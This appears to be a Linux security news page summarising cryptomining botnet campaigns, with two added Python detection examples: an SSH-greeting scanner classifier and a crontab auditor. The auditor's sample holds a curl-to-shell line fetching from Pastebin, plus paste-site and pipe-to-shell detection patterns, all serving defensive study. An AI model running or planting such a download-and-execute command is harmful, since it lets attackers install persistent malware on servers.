
Stay Ahead With Linux Security News


Explore Latest Linux Security news

We found 7 articles for you...

Cloud Threat Advisory: Docker, Hadoop, Confluence, Redis Cryptomining Risks

A recent attack campaign targeted publicly accessible Docker, Hadoop, Confluence, and Redis deployments. The attackers exploited misconfigurations and known vulnerabilities to implant cryptominers on compromised systems. As Linux admins, infosec professionals, Internet security enthusiasts, and sysadmins, it is crucial to understand the implications of this attack and take appropriate measures to protect our systems.

What Is the Significance of This Cloud Security Threat?

This campaign is unique, deploying previously unseen payloads, including four binaries written in Golang. The attackers exploit common misconfigurations and vulnerabilities to gain initial access and then employ a series of shell scripts and Linux attack techniques to establish persistence and deliver a cryptocurrency miner. This level of sophistication raises questions about the attackers' resources and intentions.

The complexity of the infection chain is also notable. It involves over 10 shell scripts, binaries, persistence mechanisms, backup payload delivery methods, anti-forensics techniques, and user-mode rootkits. This complexity demonstrates the effort attackers are willing to put into compromising systems. As security practitioners, we must be aware of threat actors' evolving tactics and techniques and continuously adapt our defense strategies.

An intriguing aspect of this attack is the use of the shopt command in the shell scripts to prevent additional commands from being written to the history file. This anti-forensics technique effectively hides the attackers' activities. It is concerning that such techniques have not been observed in other campaigns, indicating the constant innovation and evolution of malware. Are other attackers using similar methods, and how can we detect and defend against them?

This attack has significant implications for Linux users. It highlights the importance of regularly patching vulnerabilities and correcting insecure configurations in Docker, Hadoop, Confluence, and Redis deployments. Additionally, it emphasizes the need for ongoing monitoring and threat intelligence to detect and respond to such attacks promptly.

The long-term consequences of this attack are concerning. It raises questions about the overall security posture of cloud environments and the inherent risks of exposing web-facing services to the Internet. As more organizations move to cloud-based deployments, the potential for attacks targeting these environments increases. Security practitioners must stay informed about reported vulnerabilities in cloud services and implement robust security measures.

Our Final Thoughts on This Recent Attack

This article serves as a wake-up call for Linux admins. The targeted attack campaign discussed here demonstrates threat actors' evolving tactics and techniques. It underscores the importance of maintaining strong security practices, regularly patching vulnerabilities, and continuously monitoring and adapting defense strategies. By staying informed, proactive, and vigilant, we can mitigate the risks posed by such attacks and protect our systems from compromise.

Examining the ramifications of a cloud security breach exploiting vulnerabilities within Docker, Hadoop, Confluence, and Redis through malicious cryptominer deployments.

Tags: Cloud Security Threats, Docker Security Risks, Cryptomining Attacks, Redis Deployment Risks

Mar 08, 2024 | Brittany Day | Cloud Security

NoaBot: SSH Brute-Force Attack on Linux Servers - Cryptomining Risk

Over the last year, a new botnet slowly grew by brute-forcing SSH passwords and installing cryptomining malware onto Linux servers. The main client of the botnet is based on the old Mirai malware, whose source code has been available for many years. However, researchers have seen that the same group has also used the more recent P2PInfect malware, which exploits Redis instances.

According to security researchers, the botnet began in January 2023. However, it has grown significantly since then, reaching its peak last month. More than 800 unique IPs from around the globe showed signs of NoaBot infection, with 10% of those based in China. The researchers said that the malware uses a simple SSH credential dictionary attack to move laterally. Restricting internet SSH access greatly reduces the risk of infection. The use of strong passwords (not the default or randomly generated ones) also helps to secure your network, since the malware guesses passwords from a list.

Modified Mirai Scanner Targets SSH

Mirai is a self-propagating DDoS botnet that first appeared in 2016. It was designed to infect embedded network devices using Telnet dictionary attacks and vulnerability exploits. The botnet was known for being the source of some of the biggest DDoS attacks on the internet. In recent years, the Mirai codebase, which includes a scanning module to propagate, an attack module, and persistence code used to hide botnet processes, has inspired many other Linux self-propagating botnets. Some focused on DDoS, while others were cryptomining.

NoaBot's creators took Mirai's source code and made some significant changes. They replaced the Telnet scan with an SSH scan. This makes sense because embedded devices that still use Telnet for command-line debugging and administration are not good targets for cryptomining, due to their limited computing power. Linux servers, on the other hand, are good targets and more likely to be SSH-enabled. SSH dictionary attacks, where an attacker tests predefined usernames and passwords, are not new. They are easy to defend against if you follow best security practices, such as using SSH key-based authentication and disabling password authentication. The servers that were compromised by NoaBot would be considered low-hanging fruit from a security standpoint. It wouldn't surprise us if the servers had already been infected with other malware.

The NoaBot SSH scan has a clear signature: the botnet client sends the message "hi" when an address accepts an SSH connection. This isn't a valid SSH command, and there isn't a practical reason to send it, so it can be used as a firewall signature.

NoaBot has also been modified by changing its compiler from GCC to uClibc, which significantly alters the binary code and means it is detected differently than Mirai. It also added command-line arguments to enable various functionalities. The bot, for example, can install an attacker-controlled SSH key to ensure persistence, even if password authentication is disabled. As a backup, it also downloads and adds additional binaries, and it adds an entry in crontab to ensure that it starts up after reboot. This persistence mechanism's command-line flag is "noa," which inspired the name of the botnet. Researchers found signatures for "noa" in antivirus engines, which indicates that it is a common prefix.

Cryptominer Modification and P2PInfect Connection

The cryptomining component of NoaBot is XMRig, an open-source, widely used cryptocurrency miner that is popular among attackers. Akamai researchers claim that the NoaBot creators modified the XMRig code to conceal and encrypt the configuration, including the IP address of the mining pool where the attackers collect their cryptocurrency.

"We believe the threat actors have chosen to run their private pool rather than a public pool. This eliminates the need to specify the wallet (their pool and their rules!)," researchers said. The researchers added, "In our samples, we noticed that the miner's sites were no longer resolvable with Google's DNS. We can't prove our theory or collect more data because the domains are unresolved." There haven't been any recent incidents that drop the miner. It could be that the threat actor decided to leave for "greener pastures."

Researchers are confident that the same authors also use a customized version of P2PInfect. This self-replicating malware appeared in July and is written in Rust. The P2PInfect samples contained some of the same inside jokes and text found in the NoaBot code. P2PInfect uses a Lua flaw to compromise Redis, an in-memory data store, and variants may also contain an SSH scan. It is not clear why this group switched from Mirai, which was a more customized creation, to P2PInfect, or whether they are using both at the same time. Researchers offered two explanations: custom code is more difficult to reverse-engineer than repurposed code because it has been modified, and, since the threat actors are tech-savvy, they may be developing malware out of boredom or curiosity. P2PInfect is a tool that targets Redis servers, so it may also be a case of different tools being used for different purposes.

How Can I Secure My Servers Against This Threat?

To protect against this threat and enhance the security of your servers, SSH access should be restricted to trusted IP addresses, and key-based authentication is recommended as part of SSH hardening. Have additional questions about securing your Linux servers? Please reach out to us on X @lnxsec - we're here to help! Stay safe out there, fellow Linux users!

Tags: NoaBot Threat, SSH Attack Prevention, Cryptomining Botnet, Linux Security Practices, Mirai Malware

Jan 10, 2024 | LinuxSecurity.com Team | Server Security
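The "hi" greeting described above is a detectable anomaly because RFC 4253 requires every real SSH client to open with an identification string of the form "SSH-2.0-software". The following is an added example, not code from the article or from Akamai's research; it assumes the "hi" arrives as the client's first payload after the TCP handshake and runs over constructed connection records rather than real captures.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable

# RFC 4253 section 4.2: a client opens with "SSH-protoversion-softwareversion[ SP comments] CR LF".
# The pattern is slightly looser than the RFC on allowed characters; it only needs to tell an
# SSH client apart from something that is not speaking SSH at all.
SSH_IDENT_RE = re.compile(rb"^SSH-(1\.99|2\.0)-[\x21-\x7e]+(?: [\x20-\x7e]*)?\r?\n")


@dataclass(frozen=True)
class Connection:
    src_ip: str
    dst_port: int
    first_payload: bytes  # first bytes the client sent after the TCP handshake


def classify_first_payload(payload: bytes) -> str:
    """Label a client's opening bytes on an SSH listener.

    Returns one of:
      "ssh-ident"  - shaped like an SSH identification string (normal client)
      "noabot-hi"  - the bare "hi" greeting the article attributes to NoaBot's scanner
      "anomalous"  - anything else (not an SSH client; treat as a probe or scanner)
    """
    if SSH_IDENT_RE.match(payload):
        return "ssh-ident"
    if payload.strip(b"\r\n\x00 ").lower() == b"hi":
        return "noabot-hi"
    return "anomalous"


def flag_scanners(connections: Iterable[Connection], ssh_ports=(22,)) -> Dict[str, str]:
    """Return {src_ip: label} for sources whose first payload on an SSH port was not an SSH banner."""
    flagged: Dict[str, str] = {}
    for c in connections:
        if c.dst_port not in ssh_ports:
            continue
        label = classify_first_payload(c.first_payload)
        if label != "ssh-ident":
            flagged[c.src_ip] = label
    return flagged


# Constructed sample connections (hypothetical addresses, not real captures).
SAMPLE_CONNECTIONS = [
    Connection("198.51.100.7", 22, b"SSH-2.0-OpenSSH_9.6\r\n"),
    Connection("198.51.100.8", 22, b"SSH-2.0-libssh2_1.11.0 comments here\r\n"),
    Connection("203.0.113.42", 22, b"hi"),
    Connection("203.0.113.43", 22, b"GET / HTTP/1.1\r\n"),
    Connection("203.0.113.44", 80, b"hi"),  # not an SSH port; ignored
]

if __name__ == "__main__":
    for ip, label in flag_scanners(SAMPLE_CONNECTIONS).items():
        print(f"{ip}: {label}")
```

The flagged sources are candidates for a firewall block or for correlation with failed-password counts in the SSH auth log, which is where the dictionary attack itself shows up.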

Linux IoT Edge Security: Balancing Opportunities and Risks

The rise of Linux in edge computing and IoT brings both promise and peril. Linux dominates the IoT and edge computing landscape. Its flexibility and open-source nature make it the top choice for adopters. However, with such widespread usage comes heightened risk.

While Linux offers advantages, its openness can lead to vulnerabilities if not properly secured and maintained. Through unpatched devices, misconfigurations, supply chain exploits, and cryptomining, attackers continuously probe Linux's defenses. Defenders must remain vigilant. But armed with best practices and ongoing guidance from experts, the Linux community can mitigate the risks. With care, Linux's benefits can continue to outweigh its drawbacks across the expanding terrain of edge and IoT.

Linux Dominance

There's no doubt that Linux has become the operating system of choice for IoT and edge computing deployments. This open-source OS now accounts for the vast majority of software that runs on connected embedded devices or edge gateways. The flexibility, stability, and customization options that Linux offers perfectly fit the highly diverse use cases we see in IoT and edge computing infrastructure. Industry analyst Roy Illsley points out that “Linux leads all operating systems by far in IoT and edge devices.” The scale of Linux deployments in these areas is remarkable, with some estimates suggesting that Linux now runs on over 80% of all new embedded computing systems. Even Microsoft, with its capable Windows IoT platform, is far behind in comparison.

Most experts agree that Linux adoption will only accelerate as IoT and edge computing continue to transform industries. The developer-friendly nature of Linux, combined with its modular architecture, open standards, and lack of licensing costs, makes it nearly impossible to beat for the unique needs of connected devices. For the foreseeable future, Linux remains the platform of choice for the majority of organizations building out IoT and edge ecosystems.

Security Concerns

Linux has a reputation for security but is still vulnerable to exploits. As adoption spreads, attackers are increasingly targeting Linux devices. Weak default configurations, unpatched vulnerabilities, and software bugs expose systems. Esoteric hardware amplifies dangers by limiting visibility and control. Legacy code creates risks that are difficult to mitigate. While open source enables scrutiny, few audit Linux code deeply. Distributions lag in patching known issues. Complexity multiplies the exposure surface and obscures problems. Automated scanning helps but is not foolproof. Linux admins and users cannot be complacent. Proper configuration, logging, monitoring, and patching are essential. A zero-trust approach provides defense in depth. Multi-layered security protects against both known and unknown threats.

Patching Difficulties

When it comes to patching and updating Linux deployments, especially at the edge, there are major challenges. The wide variety of distros and customized versions makes centralized patching incredibly difficult. Older embedded devices may not even have options to update the Linux kernels and distros running on them. Unlike in the data center, where organizations have control and regular patching processes, remote edge devices can be neglected. The lack of visibility into the diverse Linux deployments means organizations don't even know the patch levels. And even if they did, trying to patch so many different customized distros is messy. This fragmentation is a huge issue when trying to maintain the security of Linux in edge computing.

Misconfigurations

One of the biggest risks with Linux in edge and IoT deployments that the article highlights is misconfiguration of the systems. With so many devices deployed, it can be easy for admins to improperly configure Linux settings and open themselves up to security issues. Things like default credentials, unnecessary services left running, and failure to enable security measures can give attackers an easy way in if admins aren't careful. The scale of many edge and IoT networks makes this especially concerning. Even if the chance of misconfiguration is low on any given device, with thousands or even millions of devices out there, attackers are likely to find weaknesses to exploit. Proper configuration management and hardening of these Linux systems is critical. Organizations can't just set them and forget them. They need to be proactively monitored and managed to identify and mitigate risks from misconfigurations. Failing to do so could have serious consequences.

Cryptomining Threat

One rising issue for Linux devices is the risk of being co-opted for illicit cryptomining. The open nature of Linux, the ubiquity of IoT gadgets running Linux kernels, and the increasing value of cryptocurrencies create a perfect storm. Without diligent security measures, Linux systems can be compromised and secretly used to mine cryptocurrencies. This consumes device resources and slows down systems while generating profit for attackers. Linux-based cryptomining malware is advancing in sophistication. Threat actors have developed stealthy techniques that fly under the radar by throttling mining speeds and masking traffic. Even worse, compromised devices can spread malware payloads further to propagate the cryptomining infection. This poses severe consequences for enterprises, as CPU-intensive cryptomining can disrupt business operations and drive up electricity costs. Consumer IoT devices are impacted as well, with personal gadgets degraded by illicit mining activities. Proactive measures like access controls, least privilege principles, and real-time monitoring help mitigate the risks. But as cryptocurrencies become more valuable, Linux systems will continue to be probed for mining potential, requiring constant vigilance.

Supply Chain Risks

Vulnerabilities introduced into Linux devices via suppliers in the supply chain are a major concern. As Linux becomes more ubiquitous in IoT and edge devices, the number of different parties involved in building and distributing these devices increases dramatically. Each supplier in the chain could potentially introduce vulnerabilities, whether accidental or intentional. These risks span from the chips and other hardware components being compromised to pre-installed software containing vulnerabilities or backdoors. With multiple suppliers involved, there is an increased risk of a weaker link being exploited. Supply chain attacks may be sophisticated and hard to detect, and companies often blindly trust the hardware and software from vendors. Proper vetting and auditing of suppliers is critical. However, there are challenges with existing solutions, as many manufacturers feel it's too difficult and costly to perform thorough security reviews of suppliers. Often they rely on certifications or claims instead of doing comprehensive testing themselves. With lives potentially depending on the functions of IoT and edge devices, better supply chain assurance is essential.

Expert Guidance

As Linux usage grows in edge computing and IoT, many industry experts have provided recommendations to help secure deployments. Careful configuration and constant vigilance are key. CIS Benchmarks offer configuration guidance, and scoring tools like Lynis provide auditing. Multi-factor authentication protects logins. As edge Linux expands, a holistic approach can help balance convenience and security. Care, expertise, and constant improvement are essential. With prudent measures, the benefits can outweigh the risks.

Future Outlook

There are several key areas to monitor in the coming years regarding Linux security in edge computing and IoT devices. Open-source vulnerabilities will likely continue to surge as Linux expands its dominance in connected devices. More widespread adoption also creates a broader attack surface. Infosec pros should prioritize tools and processes to identify and patch Linux vulnerabilities quickly. As IoT devices proliferate, botnets of compromised Linux devices could emerge as a major DDoS threat. Enterprises will need visibility and control over all connected devices. Multi-factor authentication, network segmentation, and behavior monitoring are critical safeguards. The supply chain risks around IoT devices and edge computing hardware containing Linux are severe. Vetting suppliers, firmware validation, and hardware integrity checks will be essential. Open-source firmware audits are also advised. AI-powered autonomous hacking presents a next-gen danger to Linux devices. Self-learning algorithms could eventually seek out and exploit vulnerabilities faster than humans. Proactive Linux hardening and behavioral AI detection solutions will be important defenses. With more mission-critical workloads handled by Linux in edge computing, the impact of outages and disruptions will magnify. Resiliency through multi-node deployments and redundancy is highly recommended.

Our Final Thoughts on the Rise of Linux in Edge Computing and IoT

As we've seen, Linux has rapidly become the dominant OS for edge computing and IoT devices. This growth brings many advantages, like flexibility, customizability, and lower costs. However, it also introduces new security risks that the industry is still learning how to address properly. Several key challenges were covered, including the difficulty of patching heterogeneous Linux devices, misconfigurations leaving systems exposed, the rising threat of cryptominers, and potential supply chain compromises. While Linux's open ecosystem enables faster innovation, it provides more opportunities for attackers as well. Experts agree that a layered security approach is needed. Multi-factor authentication, network monitoring, file integrity checking, access controls, and enhanced endpoint security all play critical roles. More work is still required to make secure configurations and best practices easier to implement for diverse edge hardware. The future of edge computing is bright, but security must remain top of mind. With collaboration across the open-source community and diligent efforts by enterprise adopters, Linux can continue flourishing as a secure, versatile OS powering our connected world. Though risks exist, they can be overcome through vigilance, expertise, and proactive security measures.

The growth of Linux in IoT and edge technology presents potential but demands meticulous actions to tackle security challenges.

Tags: Edge Computing, IoT Security, Configuration Management, Security Risks, Patching Linux

Jan 03, 2024 | Brittany Day | IoT Security

Chaos RAT Targets Linux Cryptomining Systems With Advanced Functions

A type of cryptomining malware targeting Linux-based systems has added capabilities by incorporating an open source remote access trojan called Chaos RAT, which has several advanced functions that bad guys can use to control remote operating systems.

Trend Micro security researchers discovered the threat last month. Like earlier, similar versions of the miner that also target Linux operating systems, the code kills competing malware and resources that affect cryptocurrency mining performance. The newer malware then establishes persistence "by altering /etc/crontab file, a UNIX task scheduler that, in this case, downloads itself every 10 minutes from Pastebin," wrote Trend Micro researchers David Fiser and Alfredo Oliveira. After that, it downloads an XMRig miner, a configuration file, another payload that continually kills competing malware, and the Chaos RAT (remote access tool), which is written in Go and has a ton of capabilities, including restarting and shutting down the victim's machine.

Tags: cryptomining, chaos rat, linux malware, remote access, advanced functions

Dec 14, 2022 | LinuxSecurity.com Team | Hacks/Cracks
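The /etc/crontab persistence quoted above (a job that re-fetches the payload from Pastebin every 10 minutes) is the kind of entry a periodic audit can catch. The following is an added example, not code from the article or from Trend Micro: it parses system-crontab lines, derives the run interval from the minute field, and flags only entries that combine a download-and-execute pattern with a high frequency. The crontab text and the Pastebin path are constructed placeholders.

```python
import re
from typing import Dict, List

# Constructed /etc/crontab sample (not a real artifact). The third line mimics the pattern the
# Chaos RAT write-up describes: a root job re-fetching a payload from Pastebin every 10 minutes.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
*/10 * * * * root curl -fsSL https://pastebin.com/raw/EXAMPLE_ID | sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
"""

# Paste sites commonly abused as payload hosts; extend with your own intel.
SUSPICIOUS_HOSTS = ("pastebin.com", "paste.ee", "hastebin")
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def minute_interval(minute_field: str) -> int:
    """Smallest gap in minutes implied by the crontab minute field (60 for a single value)."""
    if minute_field == "*":
        return 1
    values = set()
    step_min = 60
    for part in minute_field.split(","):
        if part.startswith("*/"):
            step_min = min(step_min, int(part[2:]))
        elif "-" in part:
            lo, hi = part.split("-")
            values.update(range(int(lo), int(hi) + 1))
        else:
            values.add(int(part))
    if len(values) >= 2:
        vs = sorted(values)
        gaps = [b - a for a, b in zip(vs, vs[1:])] + [60 - vs[-1] + vs[0]]
        step_min = min(step_min, min(gaps))
    return step_min


def parse_system_crontab(text: str) -> List[Dict[str, str]]:
    """Parse /etc/crontab-style lines (5 time fields, user, command); skip comments and VAR=value lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]+=", line):
            continue
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        minute, hour, _dom, _month, _dow, user, command = parts
        entries.append({"minute": minute, "hour": hour, "user": user, "command": command})
    return entries


def audit_crontab(text: str, max_frequent_minutes: int = 15) -> List[Dict]:
    """Return entries that look like download-and-run persistence.

    Frequency alone is never flagged (plenty of legitimate jobs run often); a fetch from a
    paste site or a download piped into a shell is required, and the interval is reported
    as an additional reason when the job also runs at least every max_frequent_minutes.
    """
    findings = []
    for e in parse_system_crontab(text):
        cmd = e["command"].lower()
        reasons = []
        if any(h in cmd for h in SUSPICIOUS_HOSTS):
            reasons.append("fetches from paste site")
        if PIPE_TO_SHELL_RE.search(cmd):
            reasons.append("pipes download to shell")
        if reasons and e["hour"] == "*" and minute_interval(e["minute"]) <= max_frequent_minutes:
            reasons.append(f"runs every {minute_interval(e['minute'])} min")
        if reasons:
            findings.append({**e, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"{f['user']}: {f['command']}  <- {', '.join(f['reasons'])}")
```

The same parser can be pointed at /etc/cron.d/* and, with the user field dropped, at per-user crontabs, which is where the NoaBot persistence entry described elsewhere on this page would land.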

Microsoft Alerts on 8220 Gang Malware Threat to Linux Systems

Microsoft warns over recent work by the '8220' malware gang to compromise Linux systems and install cryptomining malware.

Microsoft says it has spotted "notable updates" to malware targeting Linux servers to install cryptominer malware. Microsoft has called out recent work from the so-called "8220 gang" group, which has recently been spotted exploiting the critical bug affecting Atlassian Confluence Server and Data Center, tracked as CVE-2022-26134.

Microsoft has detected enhancements in malware focusing on Linux environments, with the intention of deploying cryptocurrency mining applications.

Tags: Linux Malware, Cryptomining Threats, Microsoft Alerts

Jul 01, 2022 | LinuxSecurity.com Team | Hacks/Cracks

Panchan Botnet Lateral Movement in Linux Education Servers

A new peer-to-peer botnet named Panchan appeared in the wild around March 2022, targeting Linux servers in the education sector to mine cryptocurrency.

Panchan is equipped with SSH worm functions like dictionary attacks and SSH key abuse to perform rapid lateral movement to available machines in the compromised network. At the same time, it has powerful detection avoidance capabilities, such as using memory-mapped miners and dynamically detecting process monitoring to stop the mining module immediately.

Panchan leverages SSH weaknesses to facilitate lateral propagation and covert cryptocurrency mining on compromised Linux servers within the academic realm.

Tags: Panchan Botnet, SSH Exploits for Linux, Cryptomining Threats, Peer-to-Peer Malware

Jun 15, 2022 | LinuxSecurity.com Team | Hacks/Cracks

New Sysrv-K Botnet Targets Linux And Windows Web Servers With Exploits

Microsoft says the Sysrv botnet is now exploiting vulnerabilities in the Spring Framework and WordPress to ensnare and deploy cryptomining malware on vulnerable Windows and Linux servers.

Redmond discovered a new variant (tracked as Sysrv-K) that has been upgraded with more capabilities, including scanning for unpatched WordPress and Spring deployments. "The new variant, which we call Sysrv-K, sports additional exploits and can gain control of web servers" by exploiting various vulnerabilities, the Microsoft Security Intelligence team said in a Twitter thread.

Tags: Sysrv Botnet, Exploiting Vulnerabilities, Spring Framework Exploit

May 17, 2022 | Brittany Day | Security Vulnerabilities

FreakOut Botnet: DDoS and Cryptomining Threats for Linux Systems

Researchers are tracking a new botnet dubbed "FreakOut" that's targeting vulnerabilities in Linux systems. Botnet operators have been mass-scanning for vulnerable Linux devices, and the command-and-control server associated with FreakOut has now targeted several hundred vulnerable devices.

The goal behind the botnet's attacks, researchers say, is to create an IRC botnet - a collection of machines infected with malware that can be remotely controlled - that then can be used for malicious activities, such as launching distributed denial-of-service attacks or cryptomining (see: Monero Mining Botnet Targets PostgreSQL Database Servers). The FreakOut botnet is targeting Linux-based systems that include the TerraMaster operating system, which manages TerraMaster network-attached storage servers; the Zend framework, designed to build web application services using PHP; and Liferay Portal, a web application platform that enables users to create portals and websites.

Tags: FreakOut Botnet, Linux Vulnerabilities, DDoS Attacks, Botnet Security, Cryptomining Threats

Jan 21, 2021 | LinuxSecurity.com Team | Hacks/Cracks
